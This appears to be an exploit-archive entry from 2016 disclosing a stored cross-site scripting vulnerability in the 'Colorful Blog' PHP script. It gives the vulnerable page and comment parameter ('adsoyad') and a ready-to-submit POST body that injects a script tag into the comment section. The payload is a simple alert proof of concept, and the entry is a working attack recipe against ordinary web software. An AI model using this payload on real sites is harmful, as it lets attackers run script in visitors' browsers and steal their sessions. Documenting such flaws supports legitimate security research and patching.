id: 25553
date: 10/13/2016
title: Colorful Blog - Stored Cross Site Scripting
author: Besim
cves: 

# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------  : Besim
# Google Dork : ---------  :    -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP  
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
 
 
Description : 
 
# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'
 
*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 
 
*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post

#  0day.today [2023-03-23]  #